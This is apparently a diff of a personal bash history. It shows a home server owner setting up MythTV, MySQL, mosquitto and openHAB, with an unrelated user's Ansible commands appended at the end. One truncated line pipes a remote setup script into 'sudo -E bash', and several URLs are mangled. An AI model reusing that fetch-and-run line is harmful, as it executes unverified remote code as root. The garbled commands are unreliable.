--xmlfile .mythtv/.w++/guide.xml +#1516924737 +less /var/log/dmesg | grep ttyUSB +#1516928589 +mythfilldatabase --manual --file --sourceid 1 --refresh 14 --xmlfile .mythtv/.w++/guide.xml +#1516928602 +mythfilldatabase --file --sourceid 1 --refresh 7 --xmlfile .mythtv/.w++/guide.xml +#1516928806 +sh .mythtv/.w++/run.sh +#1516930961 +}'pwd>&8;kill -STOP $$' +#1516930667 +journalctl -xe +#1516972666 +la +#1516973103 +ls +#1516973112 +ls -lqa +#1516973115 +ls -la +#1516972681 +./run.sh +#1516975435 +journalctl -f +#1516981600 +htop +#1517050088 +ls +#1517050105 +ls .mythtv/.w++/update.sh +#1517050110 +ls .mythtv/.w++/ +#1517050122 +nano .mythtv/.w++/update.sh +#1517050151 +mythfilldatabase --file --sourceid 1 --refresh 7 --xmlfile .mythtv/.w++/guide.xml +#1517050410 +nano .mythtv/.w++/update.sh +#1517050464 +}'pwd>&8;kill -STOP $$' +#1517050632 +tv_grab_wg++ +#1517050668 +tv_grab_wg++ /home/terror/.mythtv/.w++/guide.xml +#1517050675 +htop +#1517051068 +tv_grab_wg++ --help +#1517051139 +tv_grab_wg++ /home/terror/.mythtv/.w++/guide.xml +#1517051372 +htop +#1517051841 +crontab -e +#1517052211 +crontab ---help +#1517052224 +crontab -l +#1517052679 +sh /home/terror/.mythtv/mc2xml/update-mc2xml.sh +#1517052700 +crontab -e +#1517054434 +tv_grab_wg++ +#1517054479 +tv_grab_wg++ /home/terror/.mythtv/.wg++/guide.xml +#1517054531 +nano /usr/bin/tv_grab_wg++ +#1517054674 +nano /usr/bin/tv_grab_wg++ +#1517054800 +tv_grab_wg++ /home/terror/.mythtv/.wg++/guide.xml +#1517054957 +htop +#1517056662 +/home/terror/.mythtv/.w++/run.sh +#1517051176 +journalctl -f +#1517066835 +cler +#1517066846 +mysqltuner +#1517066944 +mysql -u root +#1517067512 +mysqloptimize -A +#1517069620 +mysqltuner +#1517070990 +mysqltuner --help +#1517071024 +mysqltuner +#1517057547 +/home/terror/.mythtv/.w++/run.sh +#1517050461 +mc +#1516924742 +journalctl -f +#1517113929 +aptup && aptfu +#1517114545 +mythtv --status +#1517114552 +mythtv-status +#1517114578 +mysqltuner +#1517114899 +4 www +#1517115103 +mysqltuner +#1517115360 +mythtv-status +#1517115364 +mythtv-status --help +#1517115398 +mythtv-status -ce +#1517115402 +mythtv-status -c -e +#1517115407 +mythtv-status -c +#1517115555 +FireMotD +#1517115581 +/opt/FireMotD/FireMotD +#1517115588 +/opt/FireMotD/FireMotD --help +#1517115635 +/opt/FireMotD/FireMotD -v +#1517115649 +/opt/FireMotD/FireMotD -t html -v +#1517115719 +/opt/FireMotD/FireMotD -t modern -v +#1517114498 +journalctl -f +#1517117109 +reboot +#1517119629 +mysqloptimize -A +#1517119689 +mysqloptimize +#1517119694 +mysqloptimize -A +#1517119772 +mysqlrepair -A +#1517121525 +journalctl -f +#1517144233 +which steam +#1517144706 +mysqloptimize -A +#1517144746 +ls .mythtv/.w++/ +#1517144791 +.mythtv/.w++/update.sh +#1517144828 +la .mythtv/.w++/ +#1517144855 +.mythtv/.w++/run.sh +#1517144932 +nano .mythtv/.w++/WebGrab++.config.xml +#1517145076 +.mythtv/.w++/run.sh +#1517145163 +nano .mythtv/.w++/WebGrab++.config.xml +#1517145180 +.mythtv/.w++/run.sh +#1517192592 +aptup && aptfu +#1517192992 +ls Projekte/ +#1517192997 +ls -l Projekte/ +#1517193044 +rm -R ~/Projekte/mycroft-core +#1517193068 +rm -R ~/Projekte/mycroft-core +#1517193099 +rm -Rf ~/Projekte/mycroft-core +#1517193105 +ls -l Projekte/ +#1517193131 +rm -Rf ~/Projekte/ MycroftPlasmoid Mycroft-Ai-QtApplication +#1517193136 +ls -l Projekte/ +#1517193147 +ls -l Projekte/ +#1517193159 +la +#1517193192 +drwxrwxr-x 3 terror terror 4096 Jul 4 2016 bash/ +#1517193193 +drwxr-xr-x 8 terror terror 4096 Jan 15 2017 cheat/ +#1517193193 +drwxr-xr-x 3 terror terror 4096 Dez 12 01:54 dvb-mapper/ +#1517193193 +drwxrwxr-x 6 terror terror 4096 Dez 20 2016 grub-customizer-5.0.6/ +#1517193194 +drwxrwxr-x 7 terror terror 4096 Jan 23 2017 LinJarK/ +#1517193194 +drwxrwxr-x 5 terror terror 4096 Jul 3 2016 lossless_cut_myth/ +#1517193194 +drwxrwxr-x 7 terror terror 4096 Dez 3 2016 media_build/ +#1517193194 +drwxr-xr-x 4 terror terror 4096 Jan 15 2017 Mycroft-Ai-QtApplication/ +#1517193195 +drwxr-xr-x 6 terror terror 4096 Jan 15 2017 MycroftPlasmoid/ +#1517193195 +drwxrwxr-x 2 terror terror 4096 Jul 18 2016 mysqltuner/ +#1517193195 +drwxrwxr-x 8 terror terror 4096 Aug 16 03:32 mythbuntu-remote-manager/ +#1517193196 +drwxr-xr-x 6 terror terror 4096 Dez 12 01:56 pxe-bootloaders-and-configs/ +#1517193196 +drwxrwxr-x 6 terror terror 4096 Aug 14 2016 turnoff/ +#1517193196 +drwxrwxr-x 3 terror terror 4096 Apr 1 2016 tvspielfilm2xmltv-master/ +#1517193196 +drwxr-xr-x 13 terror terror 4096 Dez 26 02:28 UbuntuBatches/ +#1517193197 +-rw-r--r-- 1 terror terror 166 Jul 23 2016 99-mythbackend.rules +#1517193197 +-rw-rw-r-- 1 terror terror 3829 Aug 16 2016 alt-tmux.conf +#1517193197 +-rw-r--r-- 1 terror terror 27565677 Dez 20 15:18 apache-karaf-4.1.4.tar.gz +#1517193198 +-rw-rw-r-- 1 terror terror 4075 Mai 3 2017 config-bashrc-master.zip +#1517193198 +-rw-rw-r-- 1 terror terror 922 Jul 23 2016 forcetek.strangled.net +#1517193198 +-rw-rw-r-- 1 terror terror 913 Jul 23 2016 homebrew.nhance.com +#1517193199 +-rwxr-xr-x 1 terror terror 1505 Jan 9 2017 kernel-4.8.17-stable* +#1517193199 +-rw-rw-r-- 1 terror terror 16160 Jan 24 02:43 master.zip +#1517193199 +-rw-rw-r-- 1 terror terror 1271272 Mär 19 2016 mc2xml +#1517193199 +-rw-rw-r-- 1 terror terror 4 Jan 30 2017 mycroft-core.kateproject.notes +#1517193200 +-rw-rw-r-- 1 terror terror 145715 Dez 3 2016 netflix.patch +#1517193200 +-rw-rw-r-- 1 terror terror 1399717 Aug 19 05:12 plugin.video.burningseries. +#1517193200 +-rw-rw-r-- 1 terror terror 2809 Aug 18 05:17 pprom2 +#1517193201 +-rw-rw-r-- 1 terror terror 10746 Jul 22 2016 README.txt +#1517193201 +-rwxrwxr-x 1 terror terror 4347 Sep 2 2016 removecommercials1.sh* +#1517193201 +-rw-rw-r-- 1 terror terror 4347 Dez 31 2016 removecommercials2.sh +#1517193202 +-rwxr-xr-x 1 terror terror 4483 Jul 15 2016 removecommercials.sh* +#1517193202 +-rw-rw-r-- 1 terror terror 3405 Mai 3 2017 sensible.bash +#1517193202 +-rwxrwxr-x 1 terror terror 2022 Mai 3 2017 snippet_14.sh* +#1517193202 +-rw-rw-r-- 1 terror terror 2 Mai 3 2017 snippet_17-ok.sh +#1517193203 +-rw-rw-r-- 1 terror terror 3686 Aug 19 10:00 sslipblacklist.csv +#1517193203 +-rw-r--r-- 1 terror terror 2967 Aug 16 2016 tmux.conf +#1517193203 +-rw-rw-r-- 1 terror terror 58690 Jan 24 02:43 tvspielfilm2xmltv.git +#1517193204 +-rw-rw-r-- 1 terror terror 2871995 Jun 19 2017 WebGrabPlus_V2.1_install.tar.gz +#1517193223 +nano acidential_Deleted_files.txt +#1517193245 +nano acidential_Deleted_files.txt$ -> ls -l Projekte/ +#1517193245 +insgesamt 32720 +#1517193245 +drwxrwxr-x 3 terror terror 4096 Jul 4 2016 bash/ +#1517193245 +drwxr-xr-x 8 terror terror 4096 Jan 15 2017 cheat/ +#1517193246 +drwxr-xr-x 3 terror terror 4096 Dez 12 01:54 dvb-mapper/ +#1517193246 +drwxrwxr-x 6 terror terror 4096 Dez 20 2016 grub-customizer-5.0.6/ +#1517193246 +drwxrwxr-x 7 terror terror 4096 Jan 23 2017 LinJarK/ +#1517193247 +drwxrwxr-x 5 terror terror 4096 Jul 3 2016 lossless_cut_myth/ +#1517193247 +drwxrwxr-x 7 terror terror 4096 Dez 3 2016 media_build/ +#1517193247 +drwxr-xr-x 4 terror terror 4096 Jan 15 2017 Mycroft-Ai-QtApplication/ +#1517193248 +drwxr-xr-x 6 terror terror 4096 Jan 15 2017 MycroftPlasmoid/ +#1517193248 +drwxrwxr-x 2 terror terror 4096 Jul 18 2016 mysqltuner/ +#1517193259 +nano acidential_Deleted_files.txt$ -> ls -l Projekte/ +#1517193259 +insgesamt 32720 +#1517193259 +drwxrwxr-x 3 terror terror 4096 Jul 4 2016 bash/ +#1517193259 +drwxr-xr-x 8 terror terror 4096 Jan 15 2017 cheat/ +#1517193260 +drwxr-xr-x 3 terror terror 4096 Dez 12 01:54 dvb-mapper/ +#1517193260 +drwxrwxr-x 6 terror terror 4096 Dez 20 2016 grub-customizer-5.0.6/ +#1517193260 +drwxrwxr-x 7 terror terror 4096 Jan 23 2017 LinJarK/ +#1517193261 +drwxrwxr-x 5 terror terror 4096 Jul 3 2016 lossless_cut_myth/ +#1517193261 +drwxrwxr-x 7 terror terror 4096 Dez 3 2016 media_build/ +#1517193269 +nano acidential_Deleted_files.txt +#1517193318 +rm -R /opt/mycroft +#1517193334 +rm -R ~/.mycroft +#1517193341 +rm -R ~/.mycroft +#1517193355 +rm -R ~/.mycroft +#1517193394 +rm -Rf ~/.mycroft +#1517193405 +rm -Rf ~/.virtualenvs/mycroft +#1517193435 +git clone +#1517193564 +bash dev_setup.sh +#1517194343 +git clone +#1517194344 +bash dev_setup.sh +#1517194367 +ls -la +#1517194420 +./start-mycroft.sh +#1517194865 +wgetses/download/V1.3/Mycroft-QtApplication-x86_64.AppImage +#1517195375 + chmod +x mycroft-qtapplication.AppImage +#1517195380 +lws +#1517195383 +ls +#1517195403 +chmod a+x mycroft-qtapplication.AppImage +#1517195412 +chmod a+x Mycroft-QtApplication-x86_64.AppImage +#1517195421 +./Mycroft-QtApplication-x86_64.AppImage +#1517195578 +chmod a+x checklogin.sh +#1517195583 +ls +#1517195639 +la +#1517195684 +cls +#1517195699 +mysqltuner +#1517198106 +mysqloptimize -A +#1517198166 +/home/terror/.mythtv/.w++/update.sh +#1517198206 +ls /home/terror/.mythtv/.wg++ +#1517198234 +nano /home/terror/.mythtv/.w++/update.sh +#1517198256 +/home/terror/.mythtv/.w++/update.sh +#1517198386 +nano /home/terror/.mythtv/.w++/run.sh +#1517198429 +nano /home/terror/.mythtv/.w++/run.sh +#1517144896 +journalctl -f +#1517199088 +nano .mythtv/.w++/WebGrab++.config.xml +#1517199123 +.mythtv/.w++/update.sh +#1517208734 +mysqloptimize -A +#1517246556 +.mythtv/.w++/update.sh +#1517249503 +.mythtv/.w++/update.sh +#1517250053 +mysqloptimize -A +#1517571639 +aptup && aptfu +#1517571934 +mysqloptimize -A +#1517579091 +mysqloptimize -A +#1517579500 +vi /home/terror/.mythtv/.w++/update.sh +#1517580153 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.wg++/de.tvtoday-guide.xml +#1517571969 +/home/terror/.mythtv/.w++/run.sh +#1517580440 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.wg++/de.tvtoday-guide.xml +#1517580471 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1517580884 +mysqloptimize -A +#1517580906 +aptup && aptfu +#1517582037 +reboot +#1517587218 +mysqloptimize -A +#1517727700 +mysqloptimize -A +#1517727735 +/home/terror/.mythtv/.w++/run.sh +#1517728474 +tv_grab_wg++ --help +#1517728489 +tv_grab_wg++ --capabilities +#1517728494 +tv_grab_wg++ +#1517732110 +locate tvdb +#1517732201 +vi /usr/share/mythtv/metadata/Television/ttvdb.py +#1517728525 +/home/terror/.mythtv/.w++/run.sh +#1517733981 +which tv_grab_wg++ +#1517734069 +ls /home/terror/.mythtv/.w++/ +#1517734126 +tv_grab_wg++ +#1517734154 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1517734530 +less /home/terror/.mythtv/.w++/WebGrab++.config.xml +#1517734793 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1517735171 +/home/terror/.mythtv/.w++/run.sh +#1517735381 +nano /home/terror/.mythtv/.w++/WebGrab++.config.xml +#1517735490 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1517735525 +/home/terror/.mythtv/.w++/run.sh +#1517737302 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1517738246 +aptup && aptfu +#1517755834 +mysqloptimize -A +#1517755866 +mosquitto_pub +#1517755903 +mosquitto_sub --help +#1517756442 +reboot && exit +#1517874510 +locate openhab +#1517874528 +}'pwd>&7;kill -STOP $$' +#1517874890 +dir+ +#1517874896 +dir +#1517874928 +mosquitto_passwd --help +#1517874967 +mosquitto_passwd +#1517874983 +mosquitto_passwd -c +#1517874991 +mosquitto_passwd -c terror +#1517875016 +mosquitto +#1517875077 +less /usr/share/doc/mosquitto/examples/mosquitto.conf.example +#1517875098 +less /usr/share/doc/mosquitto/examples/pwfile.example +#1517875108 +less /usr/share/doc/mosquitto/examples/mosquitto.conf.gz +#1517875141 +lesspipe /usr/share/doc/mosquitto/examples/mosquitto.conf.gz +#1517875154 +lesspipe /usr/share/doc/mosquitto/examples/mosquitto.conf.gz | more +#1517875557 +lesspipe /usr/share/doc/mosquitto/examples/mosquitto.conf.gz | more +#1517875583 +man mosquitto_passwd +#1517875715 +lesspipe /usr/share/doc/mosquitto/examples/mosquitto.conf.gz | more +#1517876231 +ps ax mosquitto +#1517876262 +psgrepx mosquitto +#1517876267 +psgrep mosquitto +#1517876309 +}'pwd>&7;kill -STOP $$' +#1517875754 +lesspipe /usr/share/doc/mosquitto/examples/mosquitto.conf.gz | less +#1517877601 +}'pwd>&7;kill -STOP $$' +#1517878735 +aptfu +#1517879470 +reboot +#1517879634 +journalctl -f +#1517879871 +psgrep mosquitto +#1517879884 +mysqloptimize -A +#1517880022 +journalctl -f +#1517880209 +ls -la | grep .Xa +#1517880464 +htop +#1517880537 +journalctl -f +#1517880815 +kate & +#1517880832 +exit+ +#1517880788 +ssh -X +#1517879927 +/home/terror/.mythtv/.w++/run.sh +#1517881356 +journalctl -f +#1517881422 +/usr/bin/X -nolisten tcp -background none -noreset -displayfd 20 -seat seat0 vt7 +#1517881475 +/usr/bin/X -nolisten tcp -background none -noreset -displayfd 20 -seat seat0 vt7 +#1517881505 +sddm --help +#1517881518 +sddm --test-mode +#1517881539 +sddm-greeter --help +#1517881565 +sddm-greeter --test-mode +#1517881843 +export DISPLAY=:0.0 +#1517881843 +xauth extract XKey $DISPLAY +#1517881846 +xauth merge XKey +#1517882116 +export DISPLAY=:0.0 +#1517882122 +startx +#1517882137 +startx +#1517882165 +export DISPLAY=:0 +#1517882166 +startx +#1517882184 +journalctl -f +#1517882213 +mv .Xauthority .Xauthority.bak +#1517882221 +export DISPLAY=:0.0 +#1517882228 +xauth extract XKey $DISPLAY +#1517882233 +xauth merge XKey +#1517882242 +touch .Xauthority +#1517882246 +xauth extract XKey $DISPLAY +#1517882249 +xauth merge XKey +#1517882256 +ls -l +#1517882280 +less XKey +#1517882290 +ls -la +#1517882309 +less .Xauthority +#1517882315 +lesspipe .Xauthority +#1517882358 +xauth extract XKey $DISPLAY +#1517882369 +startx +#1517882391 +visudo +#1517882535 +htop +#1517882688 +ls -la +#1517882748 +mv .Xauthority.bak .Xauthority +#1517882798 +journalctl -f +#1517882857 +htop +#1517882994 +sddmthemeinstaller --help +#1517883021 +lesspipe .Xauthority +#1517883028 +ls -la +#1517883059 +ls -la +#1517883068 +vncserver --help +#1517883100 +vncserver --list +#1517883144 +vncserver --list +#1517883169 +vncserver --help +#1517883177 +vncserver --list +#1517883256 +vncserver +#1517884170 +}'pwd>&7;kill -STOP $$' +#1517885105 +lesspipe .Xauthority +#1517885134 +sddm --test-mode +#1517885158 +systemctl stop sddm +#1517885195 +systemctl status sddm +#1517885232 +./usr/lib/x86_64-linux-gnu/sddm/sddm-helper +#1517885248 +/usr/lib/x86_64-linux-gnu/ +#1517885282 +ls -la /usr/lib/x86_64-linux-gnu/ +#1517885309 +ls -la /usr/lib/x86_64-linux-gnu/ |grep sddm +#1517885321 +ls -la /usr/lib/x86_64-linux-gnu/sddm +#1517885336 +ls -la /usr/lib/x86_64-linux-gnu/sddm/sddm-helper +#1517885344 +/usr/lib/x86_64-linux-gnu/sddm/sddm-helper +#1517885352 +/usr/lib/x86_64-linux-gnu/sddm/sddm-helper --help +#1517885367 +systemctl status sddm +#1517885417 +sddm +#1517885487 +ls -la /var/run/sddm/ +#1517885491 +ls -la /var/run/sddm +#1517885499 +ls -la /var/run +#1517885504 +ls -la /var/run/ +#1517885523 +ls -la /var/run/sddm/ +#1517885547 +ls -la /var/run/sddm/ +#1517885661 +apt search harfbuzz +#1517885940 +sddm +#1517886041 +/usr/lib/x86_64-linux-gnu/sddm/sddm-helper +#1517886054 +htop +#1517886083 +aptup && aptfu +#1517882755 +startx +#1517886970 +systemctl status sddm +#1517886999 +/usr/lib/x86_64-linux-gnu/sddm/sddm-helper +#1517887014 +killall sddm-helper +#1517887026 +killall -9 sddm-helper +#1517887037 +killall -9 sddm-helper +#1517887041 +systemctl status sddm +#1517887055 +journalctl -f +#1517887191 +startx +#1517901671 +}'pwd>&7;kill -STOP $$' +#1517902948 +wgetse/paho.mqtt-spy/releases/download/1.0.0/mqtt-spy-1.0.0.jar +#1517903780 +aptup && aptfu +#1517910064 +la +#1517910484 +sudop apt install mosquitto-clients +#1517910593 +rm -rf Key +#1517911339 +java mqtt +#1517911342 +ls +#1517912759 +openhab-cli --help +#1517912862 +openhab-cli showlogs +#1517913443 +mosquitto_sub -v -t \$SYS/# +#1517913519 +mosquitto_sub -v -t \$SYS/# -u terror +#1518011382 +aptup && aptfu +#1518011971 +aptup && aptfu +#1518013196 +mosquitto_sub -v -t \$SYS/# -u terror +#1518013208 +htop +#1518013991 +openhab-cli showlogs +#1518014048 +/home/terror/.mythtv/.w++/run.sh +#1518015106 +htop +#1518041408 +aptup && aptfu +#1518052514 +/usr/share/openhab2/runtime/bin/karaf +#1518056455 +curl -sLsource.com/setup_8.x | sudo -E bash - +#1518056582 +sudo apt-get install -y nodejs +#1518056819 +systemctl status openhab2 +#1518056985 +apt-cache showpkg openhab2 +#1518057024 +openhab-cli status +#1518057040 +openhab-cli showlogs +#1518057170 +tail -f /var/log/openhab2/openhab.log -f /var/log/openhab2/events.log +#1518057276 +systemctl status openhab2 +#1518057307 +reboot +#1518057313 +sudo reboot +#1518074222 +openhab-cli --help +#1518074235 +openhab-cli console +#1518075278 +sudo su - +#1518077002 +sudo apt-get install openhab-addon-persistence +#1518077927 +systemctl restart openhab2 +#1518078030 +mosquitto_sub -v -t \$Wohnzimmer/# +#1518078056 +mosquitto_sub -v -t Wohnzimmer/cmnd/multimedia/ +#1518085758 +mqtt-spy/ +#1518085761 +mqtt-spy/~cd +#1518085766 +#1518085767 +ls +#1518085780 +locate mqttspy +#1518085784 +locate mqtt-spy +#1518085900 +#1518085902 +la +#1518085931 +delete_recordings.py --help +#1518085940 +./delete_recordings.py --help +#1518085953 +python2 delete_recordings.py --help +#1518085964 +python3 delete_recordings.py --help +#1518085982 +python3-config +#1518085993 +la +#1518086004 +python job_queue_idle.py +#1518086014 +find_orphans.py +#1518086020 +./find_orphans.py +#1518087879 +./find_orphans.py --help +#1518087896 +nano find_orphans.py +#1518088074 +journalctl -f +#1518089837 +rm -rf /etc/letsencrypt/renewal/forcetek.strangled.net.conf +#1518089845 +sudo rm -rf /etc/letsencrypt/renewal/forcetek.strangled.net.conf +#1518089852 +journalctl -f +#1518090385 +systemctl restart openhab2 +#1518091069 +openhab-cli console +#1518092011 +systemctl restart openhab2 +#1518092441 +openhab-cli console +#1518094964 +systemctl restart openhab2 +#1518104333 +00~mosquitto:Wohnzimmer/cmnd/multimedia/power:command:01~exit +#1518104338 +exit +#1518109690 +less /usr/share/doc/packages/x2goserver +#1518109790 +ls /usr/share/x11vnc/ +#1518109802 +ls /usr/share/x2godesktopsharing/ +#1518109838 +ls /usr/share/doc/x2goserver +#1518109854 +ls /usr/share/doc/x2goserver/README.sudoers +#1518109858 +less /usr/share/doc/x2goserver/README.sudoers +#1518109918 +less /usr/share/doc/x2goserver/html/man5/x2goserver.conf.5.html +#1518109940 +lesspipe /usr/share/doc/x2goserver/html/man5/x2goserver.conf.5.html +#1518109944 +lesspipe /usr/share/doc/x2goserver/html/man5/x2goserver.conf.5.html +#1518109951 +lynx /usr/share/doc/x2goserver/html/man5/x2goserver.conf.5.html +#1518110437 +locate /lib/x2go/extensions +#1518112868 +aptup && aptfu +#1518187787 +shutdown -h now +#1518807738 +aptup && aptfu +#1518809130 +reboot +#1518809940 +htop +#1518809976 +cpufreq-info +#1518810192 +aptup && aptfu +#1518810248 +la /etc/apt/sources.list.d/ +#1518810306 +less /etc/apt/sources.list.d/3rd-Party-unofficial.list +#1518810343 +less /etc/apt/sources.list.d/x2go-ubuntu-stable-xenial.list +#1518810370 +aptup && aptfu +#1519358941 +ls /storage/mythtv/videos/ +#1519359516 +aptup && aptfu +#1519363970 +sudo apt full-upgrade -f +#1519364720 +reboot +#1519364725 +sudo reboot +#1519365209 +aptup && aptfu +#1519365327 +exit +#1519380924 +aptup && aptfu +#1519383441 +sudo openhabian-config +#1519383786 +/home/terror/.mythtv/.w++/run.sh +#1519401913 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.wg++/de.tvtoday-guide.xml +#1519401958 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1519402257 +aptup && aptfu +#1519413203 +openhab-cli showlogs +#1519440297 +aptup && aptfu +#1519444205 +cat /dev/bus/usb/009/001 +#1519444284 +lsusb +#1519444293 +lsusb -v +#1519444431 +locate 8087:07dc +#1519444438 +locate 8087 +#1519444458 +locate 07dc +#1519446468 +bluetoothctl --help +#1519452421 +mysqloptimize -A +#1519456840 +pulseaudio --help +#1519456879 +pulseaudio --cleanup-shm +#1519456953 +pulseaudio --dump-conf +#1519457000 +paplay --help +#1519457065 +paprefs --help +#1519457101 +pactl --help +#1519457139 +pactl info +#1519458021 +pactl stat +#1519458055 +}'pwd>&8;kill -STOP $$' +#1519458053 +sudo mc +#1519466944 +aptup && aptfu +#1519470389 +sudo apt-get install libsdl1.2debian-pulseaudio pulseaudio-module-gconf pulseaudio-module-lirc pulseaudio-module-x11 pulseaudio-module-zeroconf +#1519472159 +start-pulseaudio-x11 & +#1519472191 +reboot +#1519472199 +sudo reboot +#1519481928 +nano ~/.asoundrc +#1519482203 +aplay -L +#1519482757 +pactl list sinks | grep device.description +#1519482779 +pactl +#1519482785 +clear +#1519482791 +pactl liost +#1519482794 +pactl list +#1519482824 +paprefs +#1519482898 +pulseaudio -k; start-pulseaudio-x11; start-pulseaudio-kde +#1519482902 +exit +#1519482918 +pulseaudio -k; start-pulseaudio-x11; start-pulseaudio-kde +#1519482937 +pulseaudio --help +#1519483029 +amixer -c0 +#1519483752 +#1519483755 +ls +#1519483769 +#1519483780 +git clone -b rocko git://git.yoctoproject.org/poky.git +#1519484510 +#1519484512 +ls +#1519484522 +#1519484523 +ls +#1519484546 +git clone git://git.yoctoproject.org/meta-raspberrypi +#1519484562 +./oe-init-build-env +#1519484577 +. ./oe-init-build-env +#1519484629 +bitbake +#1519484668 +bitbake core-image-minimal +#1519484692 +sudo apt search chrpath +#1519484704 +sudo apt install chrpath +#1519484774 +bitbake core-image-minimal +#1519485463 +ls +#1519485481 +bitbake --help +#1519485590 +bitbake -s +#1519485783 +#1519485784 +ls +#1519485831 +source oe-init-build-env rpi-build +#1519485880 +la +#1519485958 +la conf/ +#1519485969 +nano conf/bblayers.conf +#1519486143 +#1519486145 +ls +#1519486156 +git://git.openembedded.org/meta-openembedded +#1519486175 +git clone git://git.openembedded.org/meta-openembedded +#1519486395 +git clone git://git.openembedded.org/meta-python +#1519486428 +#1519486432 +nano local.conf +#1519486607 +#1519486633 +bitbake rpi-hwup-image +#1519486679 +nano conf/bblayers.conf +#1519486706 +bitbake rpi-hwup-image +#1519486764 +#1519486770 +git clone git://git.openembedded.org/meta-python +#1519486782 +git pull git://git.openembedded.org/meta-openembedded +#1519486801 +git clone git://git.openembedded.org/meta-openembedded +#1519487639 +exit +#1519487656 +la +#1519487670 +clear +#1519487699 +#1519487700 +la +#1519487722 +clear +#1519487736 +sudo nano /etc/pulse/default.pa +#1519487840 +sudo nano /etc/pulse/client.conf +#1519487868 +sudo nano /etc/pulse/daemon.conf +#1519487905 +sudo nano /etc/pulse/system.pa +#1519487961 +sudo reboot +#1520168271 +/home/terror/.mythtv/.w++/run.sh +#1520245842 +/home/terror/.mythtv/.w++/run.sh +#1520249764 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1520683766 +aptup && aptfu +#1520686413 +ls +#1520686423 +vim homesweethome.sitemap +#1520690347 +#1520682941 +/home/terror/.mythtv/.w++/run.sh +#1520690350 +aptup && aptfu +#1520694027 +reboot +#1520693569 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1520707450 +la +#1520707453 +#1520707454 +ls +#1520707468 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1522163722 +/home/terror/.mythtv/.w++/run.sh +#1522241631 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +#1522241744 +/home/terror/.mythtv/.w++/run.sh +#1522254441 +mythfilldatabase --refresh 7 --file --sourceid 1 --xmlfile /home/terror/.mythtv/.w++/de.tvtoday-guide.xml +sudo yum install epel-release +sudo yum install ansible +sudo vi /etc/ansible/hosts +sudo vi /etc/ansible/hosts +ansible --version +sudo vi /etc/ansible/hosts +ssh-keygen +ls +cat id_rsa.pub +ssh ShilpaGiri@ +sudo vi /etc/ansible/hosts +ssh ShilpaGiri@ +ansible servers -m command -a "yum update -y" +ansible servers -m command -a "sudo yum update -y" +ansible servers -m command -a "sudo yum install java* -y" +ansible servers -m command -a "sudo yum install httpd -y" +vi agent +vi lamp.yml +ansible-playbook lamp.yml +vi lamp.yml +ansible-playbook lamp.yml + +vi lamp.yml +ls +ll +ll +ls +vi lamp.yml +ansible-playbook lamp.yml -i agent +ls +ls +vi lamp.yml +vi play.yml +ansible-playbook play.yml -i agent +sudo /etc/ansible/hosts +sudo /etc/ansible/hosts +sudo vi /etc/ansible/hosts +ls +ansible-playbook play.yml -i agent +ssh-keygen +cat id_rsa.pub +pwd +ssh ShilpaGiri@ +ls +ls +ansible-playbook play.yml -i agent +cp play.xml /home +vi play.yml +rm -rf play.yml +ls +sudo vi play.yml +ansible-playbook play.yml -i agent +ansible-playbook play.yml +vi agent +ansible-playbook play.yml -i agent +sudo vi play.yml +ansible --version +ls +rm -rf agent +vi play.retry +rm -rf play.retry +ls +ls +vi play. +vi play.retry +vi play. +vi play.yml +sudo vi play.yml +ls -l +rm -rf play.retry +ls +vi agent +ansible-playbook play.yml -i agent +vi play. +vi play.yml +sudo vi play.yml +ansible-playbook play.yml -i agent +vi play.yml +sudo vi word.yml +ansible-playbook word.yml -i agent +sudo vi word.yml +ansible-galaxy +ansible-galaxy init webserver +ls +tree +sudo yum install tree +tree +ls +ls +sudo vi action.yml +sudo vi tasks/main.yml +sudo vi role1.yml +ansible-playbook role1.yml -i agent +ls. +sudo vi webserver/tasks/main.yml +ansible-playbook role1.yml -i agent +sudo vi webserver/tasks/main.yml +ansible-playbook role1.yml -i agent +sudo vi webserver/tasks/main.yml +ansible-playbook role1.yml -i agent +sudo vi webserver/tasks/main.yml +ansible-playbook role1.yml -i agent +sudo vi webserver/tasks/main.yml . +ansible-playbook role1.yml -i agent +sudo vi webserver/tasks/main.yml . +sudo vi role1.yml +ansible-playbook role1.yml -i agent +sudo vi webserver/tasks/main.yml . +sudo vi role1.yml +ansible-playbook role1.yml -i agent +ls +ansible-playbook role1.yml -i agent +sudo vi role1.yml +sudo vi webserver/tasks/main.yml +sudo vi control.py +sudo vi sample.py +chmod 755 sample.py +ls -la +ls +ls -lrta +sudo install.ym +sudo vi install.ym +ls +sudo vi role1. +sudo vi role1.yml +ansible-playbook -i sample.py role1.yml +ansible-playbook -i sample.py +ansible-playbook -i sample.py role1.yml +sudo vi sample.py +ansible-playbook -i sample.py role1.yml +sudo vi sample.py +./sample.py +sudo ./sample.py +ansible-playbook sample.py role1.yml +sudo vi sample.py +ansible-playbook sample.py role1.yml +sudo vi sample.py +ansible-playbook -i sample.py role1.yml +sudo vi role1.yml +ansible-playbook -i sample.py role1.yml +ansible-playbook sample.py role1.yml +ansible-playbook -i sample.py role1.yml +sudo vi role1.yml +ansible-playbook -i sample.py role1.yml +ansible-playbook sample.py role1.yml +sudo vi sample.py +ll +chmod 775 sample.py +ll +sudo chmod 775 sample.py +ll +sudo vi role1.yml +ansible-playbook -i sample.py 